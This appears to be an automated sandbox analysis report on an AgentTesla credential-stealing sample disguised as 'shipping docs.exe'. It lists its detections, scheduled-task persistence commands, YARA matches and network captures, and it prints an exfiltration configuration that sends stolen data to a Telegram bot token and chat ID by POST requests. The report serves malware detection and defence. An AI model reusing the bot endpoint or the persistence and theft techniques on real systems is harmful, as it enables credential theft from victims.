Windows Analysis Report
shipping docs.exe

Overview

General Information

Sample Name: shipping docs.exe
Analysis ID: 756232
MD5: 6308ae755a893c15a989b1ccf2c56393
SHA1: 00ada70aa14a5cf26a7f8cecbaaa437267d30a2a
SHA256: 9dfdb5048599b1083fe534cf5fe5a0440d71eb74b5497e506f0a0a4c23821f40
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Injects a PE file into a foreign process
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • shipping docs.exe (PID: 2400 cmdline: C:\Users\user\Desktop\shipping docs.exe MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 5248 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • yVGAJfiVEvtg.exe (PID: 4552 cmdline: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 4792 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • yVGAJfiVEvtg.exe (PID: 3680 cmdline: {path} MD5: 6308AE755A893C15A989B1CCF2C56393)
  • VMqTMMD.exe (PID: 1280 cmdline: "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe" MD5: 6308AE755A893C15A989B1CCF2C56393)
  • VMqTMMD.exe (PID: 3124 cmdline: "C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe" MD5: 6308AE755A893C15A989B1CCF2C56393)
    • schtasks.exe (PID: 4184 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • VMqTMMD.exe (PID: 5228 cmdline: {path} MD5: 6308AE755A893C15A989B1CCF2C56393)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage?chat_id=1644584536"}
Source | Rule | Description | Author | Strings
0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
        • 0x15b63d:$a13: get_DnsResolver
        • 0x191c5d:$a13: get_DnsResolver
        • 0x159d4a:$a20: get_LastAccessed
        • 0x19036a:$a20: get_LastAccessed
        • 0x15c06b:$a27: set_InternalServerPort
        • 0x19268b:$a27: set_InternalServerPort
        • 0x15c3a0:$a30: set_GuidMasterKey
        • 0x1929c0:$a30: set_GuidMasterKey
        • 0x159e5c:$a33: get_Clipboard
        • 0x19047c:$a33: get_Clipboard
        • 0x159e6a:$a34: get_Keyboard
        • 0x19048a:$a34: get_Keyboard
        • 0x15b237:$a35: get_ShiftKeyDown
        • 0x191857:$a35: get_ShiftKeyDown
        • 0x15b248:$a36: get_AltKeyDown
        • 0x191868:$a36: get_AltKeyDown
        • 0x159e77:$a37: get_Password
        • 0x190497:$a37: get_Password
        • 0x15a992:$a38: get_PasswordHash
        • 0x190fb2:$a38: get_PasswordHash
        • 0x15ba9f:$a39: get_DefaultCredentials
00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
3.0.shipping docs.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
3.0.shipping docs.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
3.0.shipping docs.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
              • 0x34a4b:$s10: logins
              • 0x344c5:$s11: credential
              • 0x3072c:$g1: get_Clipboard
              • 0x3073a:$g2: get_Keyboard
              • 0x30747:$g3: get_Password
              • 0x31af7:$g4: get_CtrlKeyDown
              • 0x31b07:$g5: get_ShiftKeyDown
              • 0x31b18:$g6: get_AltKeyDown
3.0.shipping docs.exe.400000.0.unpack | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
              • 0x31f0d:$a13: get_DnsResolver
              • 0x3061a:$a20: get_LastAccessed
              • 0x3293b:$a27: set_InternalServerPort
              • 0x32c70:$a30: set_GuidMasterKey
              • 0x3072c:$a33: get_Clipboard
              • 0x3073a:$a34: get_Keyboard
              • 0x31b07:$a35: get_ShiftKeyDown
              • 0x31b18:$a36: get_AltKeyDown
              • 0x30747:$a37: get_Password
              • 0x31262:$a38: get_PasswordHash
              • 0x3236f:$a39: get_DefaultCredentials
0.2.shipping docs.exe.35d2730.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

                Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\shipping docs.exe, ParentImage: C:\Users\user\Desktop\shipping docs.exe, ParentProcessId: 2400, ParentProcessName: shipping docs.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp, ProcessId: 5248, ProcessName: schtasks.exe
Timestamp: 11/29/22-21:19:34.793087
Source IP: 192.168.2.3
Destination IP: 149.154.167.220
Source Port: 49699
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/29/22-21:20:32.964256
Source IP: 192.168.2.3
Destination IP: 149.154.167.220
Source Port: 49700
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 11/29/22-21:20:48.592868
Source IP: 192.168.2.3
Destination IP: 149.154.167.220
Source Port: 49701
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected


                AV Detection

Source: shipping docs.exe | ReversingLabs: Detection: 73%
Source: shipping docs.exe | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | ReversingLabs: Detection: 73%
Source: shipping docs.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe | Joe Sandbox ML: detected
Source: 3.0.shipping docs.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.shipping docs.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage?chat_id=1644584536"}
Source: shipping docs.exe.3776.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendMessage"}
Source: shipping docs.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: shipping docs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49700 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49701 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65 | Host: api.telegram.org | Content-Length: 1006 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24f8bdcd188 | Host: api.telegram.org | Content-Length: 1006 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8dad24f9334eaaa | Host: api.telegram.org | Content-Length: 1006 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://Unbjpy.com
                Source: shipping docs.exe, 00000003.00000002.534617829.000000000334B000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537871887.00000000034AF000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: shipping docs.exe, 00000003.00000002.514223306.0000000001202000.00000004.00000020.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.515645091.0000000001361000.00000004.00000020.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.512897668.0000000001029000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: shipping docs.exe, 00000000.00000003.239628147.0000000000BDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: shipping docs.exe, 00000000.00000002.265489624.0000000002481000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000004.00000002.364468167.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 0000000F.00000002.373989607.0000000002D06000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: shipping docs.exe, 00000000.00000003.242487064.0000000005480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245545950.000000000547D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers-
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comgrita
                Source: shipping docs.exe, 00000000.00000003.264268952.0000000005470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comm
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240126460.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240159233.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com8
                Source: shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.comtteJ
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn%
                Source: shipping docs.exe, 00000000.00000003.242044098.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: shipping docs.exe, 00000000.00000003.241823423.0000000005474000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242158018.000000000547B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.242049495.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnlJ
                Source: shipping docs.exe, 00000000.00000003.241799498.00000000054AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnu-h
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/$
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/O
                Source: shipping docs.exe, 00000000.00000003.243601775.0000000005474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
                Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.s.$
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240049534.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240150934.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239973997.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240136652.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239942097.0000000005494000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240076834.0000000005494000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comteP$
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krT
                Source: shipping docs.exe, 00000000.00000003.241289310.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.krigh
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240459510.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: VMqTMMD.exe, 00000015.00000002.533512375.00000000031B2000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534481256.00000000031E8000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534906198.0000000003201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://JIQ1JKgQReGyOBe.com
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/
                Source: VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/1644584536%discordapi%yyy
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument
                Source: shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
                Source: shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknown | HTTP traffic detected: POST /bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dad24f67b2ac65 Host: api.telegram.org Content-Length: 1006 Expect: 100-continue Connection: Keep-Alive
                Source: unknown | DNS traffic detected: queries for: api.telegram.org
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49699 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49700 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
                Source: VMqTMMD.exe, 0000000E.00000002.340414070.00000000010F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
